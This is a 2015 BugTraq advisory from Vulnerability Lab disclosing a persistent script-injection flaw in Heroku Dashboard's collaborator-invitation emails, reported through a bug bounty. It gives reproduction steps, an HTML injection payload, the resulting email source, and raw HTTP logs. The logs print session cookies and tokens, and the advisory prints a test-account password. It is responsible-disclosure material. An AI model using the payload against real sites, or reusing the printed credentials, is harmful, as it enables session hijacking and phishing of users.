BugTraq
Heroku API Bug Bounty #1 - Persistent Invitation Vulnerability Jan 12 2015 07:39AM
Vulnerability Lab (research vulnerability-lab com)
Document Title:
===============
Heroku API Bug Bounty #1 - Persistent Invitation Vulnerability

References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1300

Video: http://www.vulnerability-lab.com/get_content.php?id=1335

BugCrowd ID: e8a8ecb81b9bf115226ed2ff05937a0424da101610ba1289f027a1f8319d4eb9

Acknowledgement (Hall of Fame): https://bugcrowd.com/heroku/hall-of-fame

Vulnerability Magazine: http://magazine.vulnerability-db.com/?q=articles/2015/01/09/heroku-bug-b
ounty-program-2015-persistent-invitation-vulnerability

Release Date:
=============
2015-01-09

Vulnerability Laboratory ID (VL-ID):
====================================
1300

Common Vulnerability Scoring System:
====================================
4.1

Product & Service Introduction:
===============================
Heroku provides you with all the tools you need to iterate quickly, and adopt the right technologies for your project.
Build modern, maintainable apps and instantly extend them with functionality from hundreds of cloud services providers
without worrying about infrastructure. Build. Deploy. Scale. Heroku brings them together in an experience built and
designed for developers. Scale your application by moving a slider and upgrade your database in a few simple steps.
Whether your growth happens over the year or overnight, you can grow on demand to capture opportunity.

Heroku (pronounced her-OH-koo) is a cloud application platform â?? a new way of building and deploying web apps. Our service
lets app developers spend their time on their application code, not managing servers, deployment, ongoing operations, or scaling.
Heroku was founded in 2007 by Orion Henry, James Lindenbaum, and Adam Wiggins.

(Copy of the Vendor Homepage: https://www.heroku.com/home )

Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered a persistent mail encoding web vulnerability has been discovered in the official Heroku Dashboard web-application (API).

Vulnerability Disclosure Timeline:
==================================
2014-08-26: Researcher Notification & Coordination (Benjamin Kunz Mejri)
2014-08-27: Vendor Notification (Heroku Security Team - Bug Bounty Program)
2014-12-03: Vendor Response/Feedback (Heroku Security Team - Bug Bounty Program)
2015-01-08: Vendor Fix/Patch Notification (Heroku Developer Team - Reward: Bug Bounty)
2015-01-09: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Affected Product(s):
====================
Heroku
Product: Heroku Dashboard - Web Application (API) 2014 Q3

Exploitation Technique:
=======================
Remote

Severity Level:
===============
Medium

Technical Details & Description:
================================
A persistent mail encoding web vulnerability has been discovered in the official Heroku Dashboard Web-Application (API).
The application-side issue allows remote attackers to compromise emails by injection of own malicious persistent context.

The heroku dashboard impact a vulnerability inside of the invite module. After the registration with a script code payload as first- &lastname.
The heroku online-service responds without secure encoded name value inside of the invitation mailing. The attacker went after the registration
to the following webpage (https://dashboard.heroku.com/apps/asdsad/access) and is able to include any email to stream inside of the invitation
to collaborate request own malicious script codes. The request method to inject the code by registration inside of the app service is POST.
The exploitation takes place after the local attacker included another remote email to stream unauthorized malicious persistent context in
outgoing emails of the heroku online-service through an invitation to collaborate.

In the main emails of the registration the context of the database has been parsed in outgoing mail. The heroku dashboard access service does
not encode the database context on invitations to collaborate context which results in the successful exploitation of the application-side issue.
The bug typus has been declared as persistent mail encoding web vulnerability in the heroku webserver service in connection with the vulnerable
application module/function. The sender email is the main heroku reply address. The bug execution occurs in the api validation of the form that
allows to contact via invite other email contacts. In the Dashboard beta of heroku is the same bug in the same module/function available because
only the frontend has been changed during the update.

The security risk of the persistent mail encoding web vulnerability is estimated as medium with a cvss (common vulnerability scoring system)
count of 4.1. Exploitation of the persistent vulnerability in the `invitation to collaborate` module requires a low privileged heroku account
with low user interaction. Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent
redirect to external source and persistent manipulation of affected or connected module context.

Request Method(s):
[+] POST

Vulnerable Module(s):
[+] Heroku Dashboard > Apps > User[x] > Access
[+] Heroku Dashboard Beta > Apps > User[x] > Access

Vulnerable Function(s):
[+] Invitation to Collaborate
[+] Invitation

Affected Module(s):
[+] API

Proof of Concept (PoC):
=======================
The persistent mail encoding web vulnerability can be exploited by remote attackers with low privileged application user account and low user interaction.
For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.

Manual steps to reproduce the security vulnerability ...

1. Register an account with a script code payload in the first- & last-name input fields
2. Save the context and access the account
3. Register a new random app inside of the dasboard
4. Switch to the apps > access section in the regular dasboard or via beta template
5. Add any random email or heroku user account mail to the access rules and save the context
Note: A notification mail arrives at the new registered access user inbox
6. The payload executes ahead to the mail mail body context because of the registered payload inside of the user profile values
7. Successful reproduce of the persistent web vulnerability!

PenTest Account: bkm (at) evolution-sec (dot) com [email concealed]
User Password: chaos666

PoC: Mail Header > Source
----==_mimepart_53fe30f6c9dbf_79c5a2a6ac74767
Content-Type: text/plain;
charset=UTF-8
Content-Transfer-Encoding: 7bit
"><img src="x">%20%20>"<iframe src=a>%20<iframe>[PERSISTENT INJECTED SCRIPT CODE VIA INVITE TO COLLABORATE HERE!!!] (admin (at) evolution-sec (dot) com [email concealed]) has invited
you to collaborate on their app "asdsad" on Heroku:http://asdsad.herokuapp.com/
Since you already have an account with Heroku, you can get started by simply git cloning the app repository:

PoC: Invite to Collaborate (noreply (at) heroku (dot) com [email concealed])

<td style="vertical-align: top; text-align: left; padding: 0;" align="left" valign="top">
<h1 id="logo" style="color: #6E5BAA; display: block; font-family: hybrea, proxima-nova, 'helvetica neue', helvetica,
arial, geneva, sans-serif; font-size: 32px; font-weight: 200; text-align: left; margin: 0 0 40px;" align="left">
<img src="http://heroku.newsletter.s3.amazonaws.com/hk-logo.png" alt="heroku" style="outline: none; text-decoration: none; border: 0;" height="42" width="120"></h1>
<p style="margin: 20px 0;">"><img src="x">%20%20>"<iframe src="a">%20<iframe>[PERSISTENT INJECTED SCRIPT CODE VIA INVITE TO COLLABORATE HERE!!!] (admin (at) evolution-sec (dot) com [email concealed]) has
invited you to collaborate on their app "<a href="http://asdsad.herokuapp.com/" style="color: #6E5BAA;">asdsad</a>" on Heroku.</p>
<p style="margin: 20px 0;">Since you already have an account with Heroku, you can get started by simply git cloning the app repository:</p>
<blockquote style="border-radius: 5px; font-family: courier, monospace; background: #ebeaef; margin: 10px 0; border: 10px solid #ebeaef;">
<span class="shell" style="color: #6E5BAA;">$</span> git clone git (at) heroku (dot) com [email concealed]:asdsad.git -o heroku
</blockquote>
<p style="margin: 20px 0;">See <a href="http://devcenter.heroku.com/articles/collab" style="color: #6E5BAA;">our quickstart guide</a> for additional information</p>
<p style="margin: 20px 0;">
The Heroku Team<br />
<a href="https://heroku.com" style="color: #6E5BAA;">https://heroku.com</a>
</p>
</td>
</tr>
</table>
</td>
</tr>
<tr style="vertical-align: top; padding: 0;">
<td class="templateContainerPadding" align="center" valign="top" style="vertical-align: top; padding: 0 40px;">
<table id="footerContent" style="border-spacing: 0; border-collapse: collapse; font-family: proxima-nova, 'helvetica neue',
helvetica, arial, geneva, sans-serif; height: 100%; width: 100%; border-top-style: solid; border-top-color: #ebeaef; color: #999999; font-size: 12px;
background: #ffffff; margin: 0; padding: 0; border-width: 1px 0 0;">
<tr style="vertical-align: top; padding: 0;">
<td valign="top" style="vertical-align: top; text-align: left; padding: 0;" align="left">
<p style="margin: 20px 0;">
Heroku is the cloud platform for rapid deployment and scaling of web applications. Get up and running in minutes, then deploy instantly via Git.
</p>
<p style="margin: 20px 0;">
To learn more about Heroku and all its features, check out the Dev Center: <a href="https://devcenter.heroku.com/articles/quickstart"
style="color: #666666;">https://devcenter.heroku.com/articles/quickstart</a>
</p>
</td>
</tr>
</table>
</td>
</tr>
</table>
</td>
</tr>
</table>
</center>

<style type="text/css">
... ... ... ...
}
}
</style>
</body>
</html>
</body>
</html>
</iframe></p></td>

--- Poc Session Logs [POST] [Invite to Collaborate] (Notification API) ---
21:26:26.784[414ms][total 414ms] Status: 302[Found]
POST https://dashboard.heroku.com/apps/asdsad/access Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Grö�e des Inhalts[-1] Mime Type[text/html]
Request Header:
Host

[dashboard.heroku.com]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]

Accept-Encoding[gzip, deflate]
Referer[https://dashboard.heroku.com/apps/asdsad/access]
Cookie[_ga=GA1.2.1421671373.1409166519; __utma=148535982.1421671373.1409166519.1409166519.1409166519.1;

__utmb=148535982.57.10.1409166519; __utmc=148535982; __utmz=148535982.1409166519.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(
none);
optimizelySegments=%7B%22173438640%22%3A%22referral%22%2C%22173362769%22
%3A%22ff%22%2C

%22173444194%22%3A%22false%22%2C%22221602555%22%3A%22referral%22%2C%2222
1841254%22%3A%22ff%22%2C%22221734991%22%3A%22false%22%7D;
optimizelyEndUserId=oeu1409166535240r0.4472799890466287; optimizelyBuckets=%7B%7D;
mp_5414bf80e043619b56a936d7c7fe54d3_mixpanel=%7B%22distinct_id%22%3A%20%
222014-08-27%2019%3A09%3A15%20UTC%208fc99130-104b-0132-866c-062d1b005a52
%22%2C%22%24
initial_referrer%22%3A%20%22https%3A%2F%2Fdevcenter.heroku.com%2Farticle
s
%2Fdynos%22%2C%22%24initial_referring_domain%22%3A%20%22devcenter.heroku
.com%22%7D; heroku_session=1; heroku_session_nonce=0ddb0d38-d9be-4f65-82b4-19994d4222d3; _my-
heroku_session=BAh7CEkiEF9jc3JmX3Rva2VuBjoGRUZJIjFVSjJjTnVhQ1MxN09nTFJ6Y
VYzay9lY0NRQXZaZ1FIZ0xrR2l2ZHFpcHVnPQY7AEZJIg9zZXNzaW9uX2lkBjsAVEkiJWM3M
GU4YjlmYjk4MTc0Y2I5Nj
MxOTU4MmRiZGFkNDE1BjsAVEkiC2luX29yZwY7AEZG--
19be2343ca827f40ab20fc07e7093201c381af2c;
user_session_secret=BAhJIgKiBUx6RmhVbmdyV0hRd1FTOHZaMEpsVEdaWVRFUnRNSEpw
TXpOdVpISkxMMjkxZFRSeUwyMUpUa2gzVm04eGJtODNPV0V6YjNoSE9FUlZjV1pCTkdZd2JH
OVVjVlpOUmtzM2JEZFdlV
lU0YkZoMVpHSktXbXBaTUZoTFVIZExSMWx5TUhaamFtOHhWbUZ3YVdaalVXSnhUREZRVjJV
Mk5IZERaMnczVlRoNE9FOTJWbE5WYldONU9XWXhlVU5LVldKU1FqZElhR1IxU25JelJVWm5X
VVJ3WmxaTGNsRXZSaXR3VjBGR1RGVlFSMHBWZURoclVWTXZlVGc1YVdGdFFscDFPRkZ2UkVr
MmNXdzFNRTVSWWtkWU5YS
TBSSGRvUlRGWFUxQm9NMnQzTDNwd2NXTm5WakEwZURWd1IybHRablZtT0RFM2NIRjJTVlJZ
U2s1V2FtcHpXWHBqVXpsTU5FeDVlV1pqV1V4cGFXbFRVVGN4UlRkdFNFNVVaRzk1TkRkVVJr
WjVZV2RJU0VnNGQwdDNNa2xIY21RclNVNXBTRTR3TVVsMlJuaElSRXh6VEZSMFNTOU9WVU5U
UVRZd2MxbGpNSE5NY0c1c0
5XVktZMG8xVlhKRE9Fc3diSFJCYW1FeFJuaDZhRVJLWWtaa1FtMW5NM2x0YlZneWJFVkNP
VU5aVjJSeGEzRnlSbGRoVjBoMWIxZDNTWGhyWjNreWFEVlpWblJPZEZKT1NtSTRjVlJDT1dv
MFEyWXZVMUU0VVdWQmEzZENUVmRoWmpsV2NGVkxiVkl3ZVU5SlVHRmpZa2hLTDJKRlVYcHVW
V3R5ZFhacFJsUXZabUY2VTB
FeFQxTlFRamxUTVVkblJqZDRlRFpUZHpOcGFXeHplamxsTm1JM1ZWaFdkbk5UVTBJdmEy
UkxWM2hRYzJkWFlpdHRWR2RqTlRFelpYaHRiVXczVUhSc1luaHphRXh1T1UxeGFWWlZhV3hG
VEdObWRtVmpMMHBKTm5oSE5rbHpibFV3VnpaS1FtSkVTWFpuTTNOaVZFSXZkVEJyYzNGUWNI
QjZObHBvYUUxd2NuQnJaa0Z
FWnpaQlVXMWFZVFZHV1RWaWJsUlpZa3BaYkdOc2FWQmlTWFYzTVRKVVVFVnNXSGRFYTBZ
NWNHRnFObkV5TjJkSldITm5jVlkxWjJoMlRGUTRWU3RaUVU4MFEzWmpUbEZsUlU5VE4waGxi
VGh5TWtvelYyOURVM1J3ZGpONlRuWmpNU3RRWkZWSllqWkVXa3RTY1c1Rk1XcFViemx6Ym5O
bE5rOWpTRlIzTW01TVJIcGx
abTF5V2pWemFuQnRUek5CYlRoT1prbHFaMlJOUldsVVkxWldSVFJLYVU1ak1GVldUSGxV
VTNsa1VXbFRVRmh6V1VFNGVXeGxTVzh2UldrcmNpdEhWemhzVjFoTVRtdzNkMGxHUWtkb2Mw
Rk5kazE2UVRaUksySm5hMHhzU1daYWFuaE9SbXhrTUZWU1NuVkdWWEpHUkhORVZYcDBTaXRa
YTB0aU5HaHpjVm9yVTFSSmN
XWmFTR3g1VTBWM1lraFROa1ZrVkhWclRUSXpRM3BFTjNCWlNraHlaMGh1VlRKRWJsWnRR
elU0VTNkeFpXdDFOWFphTkZZdlZqUkViRXBSYUhCUWFtRm9ZelZRYUhOV1RYSjRVWGRyYm5R
NVNXbFVSak5PUkcxV1EwNVJWR3haYm5OeVlWSmFSbFZ4VWs1RFpHTXhaVVZwTldWUlVFOXJU
RmhFUnpocFIzbFpUMkpCVVZ
SSlVFWnhTMDlOZG1NclMwTndLekUwWmkwdFp6Sk5Zamg0TWxWVU1rUTVNVXRMVURoYWFW
SldkejA5LS0yN2FiYTY5MmM1MmQxYjgxMTk0NTRjNmQyM2Q4Y2Q2YTM1YTJiZGNkBjoGRUY%
3D--1a29e7f4569b51d2db15f168457ce65b8c627b9c;
dashboard_session_nonce=0ddb0d38-d9be-4f65-82b4-19994d4222d3;
_ga=GA1.3.1421671373.1409166519;

__utma=155166509.1421671373.1409166519.1409166827.1409166827.1; __utmb=155166509.9.10.1409166827; __utmc=155166509;
__utmz=155166509.1409166827.1.1.utmcsr=devcenter.heroku.com|utmccn=(refe
rral)|utmcmd=referral|utmcct=/articles/dynos;

visitor_id36622=271240760; flash=%7B%7D]
Connection[keep-alive]
POST-Daten:
utf8[%E2%9C%93]
authenticity_token[UJ2cNuaCS17OgLRzaV3k%2FecCQAvZgQHgLkGivdqipug%3D]
user%5Bemail%5D[bkm%40evolution-sec.com]
commit

[Invite]
Response Header:
Cache-Control[no-cache, no-store, must-revalidate]
Content-Type[text/html; charset=utf-8]
Date[Wed, 27 Aug 2014 19:26:46 GMT]
Expires[0]
Location

[https://dashboard.heroku.com/apps/asdsad/access]
Pragma[no-cache]
Request-Id[63991fba-fbb1-492d-8b22-866fa6111cb9]
Server[nginx/1.5.7]
Set-Cookie[flash=%7B%22notice%22%3A%22bkm%40evolution-sec.com+has+been+a
dded+to

+the+app+asdsad.%22%7D; domain=dashboard.heroku.com; path=/; secure]
status[302 Found]
Strict-Transport-Security[max-age=31536000]
X-Frame-Options[SAMEORIGIN]
X-Rack-Cache[invalidate, pass]
X-Request-Id

[63991fba-fbb1-492d-8b22-866fa6111cb9]
x-runtime[0.230753]
x-ua-compatible[IE=Edge,chrome=1]
Transfer-Encoding[chunked]
Connection[keep-alive]

21:26:27.201[474ms][total 1293ms] Status: 200[OK]
GET https://dashboard.heroku.com/apps/asdsad/access Load Flags[LOAD_DOCUMENT_URI LOAD_REPLACE LOAD_INITIAL_DOCUMENT_URI ] Grö�e des Inhalts[13369] Mime Type[text/html]
Request

Header:
Host[dashboard.heroku.com]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-

US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[https://dashboard.heroku.com/apps/asdsad/access]
Cookie[_ga=GA1.2.1421671373.1409166519; __utma=148535982.1421671373.1409166519.1409166519.1409166519.1;

__utmb=148535982.57.10.1409166519; __utmc=148535982; __utmz=148535982.1409166519.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(
none);
optimizelySegments=%7B%22173438640%22%3A%22referral%22%2C%22173362769%22
%3A%22ff%22%2C
%22173444194%22%3A%22false%22%2C%22221602555%22%3A%22referral%22%2C%2222
1841254%22%3A%22ff%22%2C%22221734991%22%3A%22false%22%7D;
optimizelyEndUserId=oeu1409166535240r0.4472799890466287; optimizelyBuckets=%7B%7D;

mp_5414bf80e043619b56a936d7c7fe54d3_mixpanel=%7B%22distinct_id%22%3A%20%
222014-08-27%2019%3A09%3A15%20UTC%208fc99130-104b-0132-866c-062d1b005a52
%22%2C%22%24
initial_referrer%22%3A%20%22https%3A%2F%2Fdevcenter.heroku.com%2Farticle
s
%2Fdynos%22%2C%22%24initial_referring_domain%22%3A%20%22devcenter.heroku
.com%22%7D; heroku_session=1; heroku_session_nonce=0ddb0d38-d9be-4f65-82b4-19994d4222d3; _my-
heroku_session=BAh7CEkiEF9jc3JmX3Rva2VuBjoGRUZJIjFVSjJjTnVhQ1MxN09nTFJ6Y
VYzay9lY0NRQXZaZ1FIZ0xrR2l2ZHFpcHVnPQY7AEZJIg9zZXNzaW9uX2lkBjsAVEkiJWM3M
GU4YjlmYjk4MTc0Y2I5Nj
MxOTU4MmRiZGFkNDE1BjsAVEkiC2luX29yZwY7AEZG--

19be2343ca827f40ab20fc07e7093201c381af2c;
user_session_secret=BAhJIgKiBUx6RmhVbmdyV0hRd1FTOHZaMEpsVEdaWVRFUnRNSEpw
TXpOdVpISkxMMjkxZFRSeUwyMUpUa2gzVm04eGJtODNPV0V6YjNoSE9FUlZjV1pCTkdZd2JH
OVVjVlpOUmtzM2JEZFdlV
lU0YkZoMVpHSktXbXBaTUZoTFVIZExSMWx5TUhaamFtOHhWbUZ3YVdaalVXSnhUREZRVjJV
Mk5IZERaMnczVlRoNE9FOTJWbE5WYldONU9XWXhlVU5LVldKU1FqZElhR1IxU25JelJVWm5X
VVJ3WmxaTGNsRXZSaXR3VjBGR1RGVlFSMHBWZURoclVWTXZlVGc1YVdGdFFscDFPRkZ2UkVr
MmNXdzFNRTVSWWtkWU5YS
TBSSGRvUlRGWFUxQm9NMnQzTDNwd2NXTm5WakEwZURWd1IybHRablZtT0RFM2NIRjJTVlJZ
U2s1V2FtcHpXWHBqVXpsTU5FeDVlV1pqV1V4cGFXbFRVVGN4UlRkdFNFNVVaRzk1TkRkVVJr
WjVZV2RJU0VnNGQwdDNNa2xIY21RclNVNXBTRTR3TVVsMlJuaElSRXh6VEZSMFNTOU9WVU5U
UVRZd2MxbGpNSE5NY0c1c05X
VktZMG8xVlhKRE9Fc3diSFJCYW1FeFJuaDZhRVJLWWtaa1FtMW5NM2x0YlZneWJFVkNP
VU5aVjJSeGEzRnlSbGRoVjBoMWIxZDNTWGhyWjNreWFEVlpWblJPZEZKT1NtSTRjVlJDT1dv
MFEyWXZVMUU0VVdWQmEzZENUVmRoWmpsV2NGVkxiVkl3ZVU5SlVHRmpZa2hLTDJKRlVYcHVW
V3R5ZFhacFJsUXZabUY2VTBF
eFQxTlFRamxUTVVkblJqZDRlRFpUZHpOcGFXeHplamxsTm1JM1ZWaFdkbk5UVTBJdmEy
UkxWM2hRYzJkWFlpdHRWR2RqTlRFelpYaHRiVXczVUhSc1luaHphRXh1T1UxeGFWWlZhV3hG
VEdObWRtVmpMMHBKTm5oSE5rbHpibFV3VnpaS1FtSkVTWFpuTTNOaVZFSXZkVEJyYzNGUWNI
QjZObHBvYUUxd2NuQnJaa0ZF
WnpaQlVXMWFZVFZHV1RWaWJsUlpZa3BaYkdOc2FWQmlTWFYzTVRKVVVFVnNXSGRFYTBZ
NWNHRnFObkV5TjJkSldITm5jVlkxWjJoMlRGUTRWU3RaUVU4MFEzWmpUbEZsUlU5VE4waGxi
VGh5TWtvelYyOURVM1J3ZGpONlRuWmpNU3RRWkZWSllqWkVXa3RTY1c1Rk1XcFViemx6Ym5O
bE5rOWpTRlIzTW01TVJIcGxab
TF5V2pWemFuQnRUek5CYlRoT1prbHFaMlJOUldsVVkxWldSVFJLYVU1ak1GVldUSGxV
VTNsa1VXbFRVRmh6V1VFNGVXeGxTVzh2UldrcmNpdEhWemhzVjFoTVRtdzNkMGxHUWtkb2Mw
Rk5kazE2UVRaUksySm5hMHhzU1daYWFuaE9SbXhrTUZWU1NuVkdWWEpHUkhORVZYcDBTaXRa
YTB0aU5HaHpjVm9yVTFSSmNXW
mFTR3g1VTBWM1lraFROa1ZrVkhWclRUSXpRM3BFTjNCWlNraHlaMGh1VlRKRWJsWnRR
elU0VTNkeFpXdDFOWFphTkZZdlZqUkViRXBSYUhCUWFtRm9ZelZRYUhOV1RYSjRVWGRyYm5R
NVNXbFVSak5PUkcxV1EwNVJWR3haYm5OeVlWSmFSbFZ4VWs1RFpHTXhaVVZwTldWUlVFOXJU
RmhFUnpocFIzbFpUMkpCVVZSS
lVFWnhTMDlOZG1NclMwTndLekUwWmkwdFp6Sk5Zamg0TWxWVU1rUTVNVXRMVURoYWFW

SldkejA5LS0yN2FiYTY5MmM1MmQxYjgxMTk0NTRjNmQyM2Q4Y2Q2YTM1YTJiZGNkBjoGRUY%
3D--1a29e7f4569b51d2db15f168457ce65b8c627b9c;
dashboard_session_nonce=0ddb0d38-d9be-4f65-82b4-19994d4222d3;
_ga=GA1.3.1421671373.1409166519;

__utma=155166509.1421671373.1409166519.1409166827.1409166827.1; __utmb=155166509.9.10.1409166827; __utmc=155166509;
__utmz=155166509.1409166827.1.1.utmcsr=devcenter.heroku.com|utmccn=(refe
rral)|utmcmd=referral|utmcct=/articles/dynos;

visitor_id36622=271240760; flash=%7B%22notice%22%3A%22bkm%40evolution-sec.com+has+been+added+to+the
+app+asdsad.%22%7D]
Connection[keep-alive]
Response Header:
Cache-Control[must-revalidate, no-cache, no-store, private]

Content-Type[text/html; charset=utf-8]
Date[Wed, 27 Aug 2014 19:26:47 GMT]
Expires[0]
Pragma[no-cache]
Request-Id[843d1f47-560b-4a1d-881c-fb1ec07968b9]
Server[nginx/1.5.7]
status[200 OK]
Strict-

Transport-Security[max-age=31536000]
X-Frame-Options[SAMEORIGIN]
X-Rack-Cache[miss]
X-Request-Id[843d1f47-560b-4a1d-881c-fb1ec07968b9]
x-runtime[0.287221]
x-ua-compatible[IE=Edge,chrome=1]
Content-Length

[13369]
Connection[keep-alive]

PoC: Invite via Dashboard Beta through Heroku API

<td style="vertical-align: top; text-align: left; padding: 0;" align="left" valign="top">
<h1 id="logo" style="color: #6E5BAA; display: block; font-family: hybrea, proxima-nova, 'helvetica neue',
helvetica, arial, geneva, sans-serif; font-size: 32px; font-weight: 200; text-align: left; margin: 0 0 40px;"
align="left"><img src="http://heroku.newsletter.s3.amazonaws.com/hk-logo.png" alt="heroku" style="outline: none; text-decoration: none;
border: 0;" height="42" width="120"></h1><p style="margin:
20px 0;">"><img src="x">%20%20>"<iframe src="a">%20<iframe>[PERSISTENT INJECTED SCRIPT CODE VIA INVITE TO HEROKU HERE!!!] (admin (at) evolution-sec (dot) com [email concealed]) has
invited you to collaborate on their app "<a href="http://asdsad.herokuapp.com/" style="color: #6E5BAA;">asdsad</a>" on Heroku.</p>

<p style="margin: 20px 0;">Follow this link to get access:</p>

<p style="margin: 20px 0;"><a href="https://id.heroku.com/account/accept/2798200/b06b7e8d1ed89e674d607
f25dab10a92"
style="color: #6E5BAA;">https://id.heroku.com/account/accept/2798200/b06b7e8d1ed89e674
d607f25dab10a92</a></p>

<p style="margin: 20px 0;">Heroku is a cloud application platform ââ?¬â?? a new way of building and deploying web apps. Develop your app using your local tools,
then deploy via Git. After accepting the invitation, check out <a href="http://devcenter.heroku.com/articles/quickstart" style="color: #6E5BAA;">our quickstart guide</a></p>
<p style="margin: 20px 0;">To learn more about deploying apps on Heroku, <a href="http://devcenter.heroku.com" style="color: #6E5BAA;">check out the docs.</a></p>
<p style="margin: 20px 0;">Have fun, and don't hesitate to contact us with your feedback.</p>
<p style="margin: 20px 0;">
The Heroku Team<br />
<a href="https://heroku.com" style="color: #6E5BAA;">https://heroku.com</a>
</p>
</td>
</tr>
</table>
</td>
</tr>
</table>
</td>
</tr>
</table>
</center>

--- PoC Session Logs (Invite to Heroku via Beta Theme) [POST] (Notification API) ---

22:25:24.964[743ms][total 743ms] Status: 201[Created]
POST https://dashboard-next.heroku.com/api/apps/2737d28a-9acd-4352-a3d4-b3efb
5327d12/collaborators Load Flags[LOAD_BYPASS_CACHE LOAD_BACKGROUND ] Grö�e des Inhalts[211] Mime Type

[application/json]
Request Header:
Host[dashboard-next.heroku.com]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0]
Accept[application/vnd.heroku+json; version=3]
Accept-

Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Content-Type[application/json; charset=UTF-8]
X-CSRF-Token[IKbYx6U4o8Drv7vgoT9gX45Jegk+XVigarkg4=]
X-Requested-With[XMLHttpRequest]
Referer

[https://dashboard-next.heroku.com/apps/asdsad/access]
Content-Length[41]
Cookie[_ga=GA1.2.1421671373.1409166519; __utma=148535982.1421671373.1409166519.1409166519.1409170245.2; __utmb=148535982.36.10.1409170245;
__utmc=148535982; __utmz=148535982.1409170245.2.2.utmcsr=google|utmccn=(organic)|utmcmd=or
ganic|utmctr=(not%20provided);
optimizelySegments=%7B%22173438640%22%3A%22referral%22%2C%22173362769%22
%3A%22ff%22%2C%22173444194%22%3A%22false
%22%2C%22221602555%22%3A%22referral%22%2C%22221841254%22%3A%22ff%22%2C%2
2221734991%22%3A%22false%22%7D;
optimizelyEndUserId=oeu1409166535240r0.4472799890466287; optimizelyBuckets=%7B%7D; mp_5414bf80e043619b56a936d7c7fe54d3_mixpanel=%7B
%22distinct_id%22%3A%20%222014-08-27%2019%3A09%3A15%20UTC%208fc99130-104
b-0132-866c-062d1b005a52%22%2C%22%24
initial_referrer%22%3A%20%22https%3A%2F%2Fdevcenter.heroku.com%2Farticle
s%2Fdynos%22%2C%22%24initial_referring_domain%22%3A
%20%22devcenter.heroku.com%22%7D; heroku_session=1; heroku_session_nonce=0ddb0d38-d9be-4f65-82b4-19994d4222d3;
session=Zy3Pusin4kPPd6OSt9FhcA.neINSzdfS2R5CjblMoRCYUntFqVvMiYai26fqEvBj
FzjfKLFCGPDOq_6gCE32OQk9SO974NplMf13oRR7W1wUpYefJ_4kYO72VsPtkRKlt1fJ_bbA
13yUvVYIHHRwEvtWN_qjk7ZL-
Z09sewhk5I_YCfIEubvb4wNXAETzdbWwxLKNAf1HZQ5qkpKC4vXKpSrXIzkx1Zp1xvKuDFxa
yYaNA3F47iY7i-0mIdcC4qtP20EoaXPANL5YVoUdftj9LuFxMHqeolBDglB4wPTBoJO6rRYh
XvF-S6D7VCQVUXUDpfHnw-
SizaiacWTAst7KBGtvMb5kUomoPk_7RqJhbWtd7l7opjWQoFdvGBlWCRCyuYQPVoEnT8RCH_
cq5nkwKHMVBKFYSKTuBVDL9n6wxgkh8lofNVtL01sbCunT92Cg8QRvqLKuSfv2uPdFP0ZGDO
BbxCAafFRz_7lppQ8TfA-
Dnd00DMZZoIN-Pjd84Mntn2Ev7voqqrTjMr85hLCaX48ZLlViIwIHGkyT6fn39hVBvJdWsKp
YnOQx8JbbRAcXG9-z1ogW9iRO-8SvvX7OVDzujbA9mvdL2YgJ-M7loe5dNFKbPfxtJ_bVeVb
fqN5rhkjn6a2-0EelwwrmT
8zaGwyCfLj6Dre30FaMRo_spHe_3WQqpmGdtccgHHVfv_fTFUwtmIPVGPV9lBNI-HdOhfTXe
5vNwdMa4O_Zc8h3LJXY_SioLjT2rJpny5jyTpOmnGiKg7_5gBRrVho6a0X62v.1409166935
525.86400000.SB-
x_q66Gn0thFKWXzZnGtWq4xqLkWMrXX-s6OPg4yU; __utma=155690030.1421671373.1409166519.1409166929.1409170304.2; __utmc=155690030;
__utmz=155690030.1409170304.2.2.utmcsr=dashboard.heroku.com|utmccn=(refe
rral)|utmcmd=referral|utmcct=/apps/asdsad/access;
ref=lUfOxJR7MTq-HJ0g1YRMbgJitTUh-GL28r4373os2BeJj-FIGe2wFX7CZkOr-
wrZ6tI3U09rIeKWnfQ2P0aBX2MTYoqdRAdCNgAhXXBmKMuquCTPzqlPdhEPxdpdF70J%7CwC
AYZcZQpXb_iEF_o-HTSQ%3D%3D%7Ce7cb9d999af74418ae28fb1d3b50be583ed9c91ef71
f71aa6080f662f8e0a0f7;
__utmb=155690030.29.10.1409170304]
Connection[keep-alive]

Pragma[no-cache]
Cache-Control[no-cache]
POST-Daten:
{"user":"research (at) vulnerability-lab (dot) com [email concealed]"}[]
Response Header:
Cache-Control[no-cache]
Content-Type[application/json;charset=utf-8]
Date[Wed, 27 Aug 2014

20:25:45 GMT]
Oauth-Scope[global]
Oauth-Scope-Accepted[global write-protected]
Ratelimit-Remaining[2399]
Request-Id[fb852b2b-8596-4199-8093-4bf2f5c8c0a2]
Server[nginx/1.4.7]
status[201 Created]

Strict-Transport-Security[max-age=15768000]
Vary[Accept-Encoding]
x-content-type-options[nosniff]
X-Download-Options[noopen]
X-Frame-Options[DENY]
x-runtime[0.468937]
X-XSS-Protection[1; mode=block]

Content-Length[211]
Connection[keep-alive]

22:25:26.908[216ms][total 216ms] Status: 200[OK]
GET https://dashboard-next.heroku.com/alpha-api/notifications Load Flags[LOAD_BACKGROUND ] Grö�e des Inhalts[2] Mime Type[application/json]
Request Header:
Host[dashboard-

next.heroku.com]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0]
Accept[application/vnd.heroku+json; version=3]
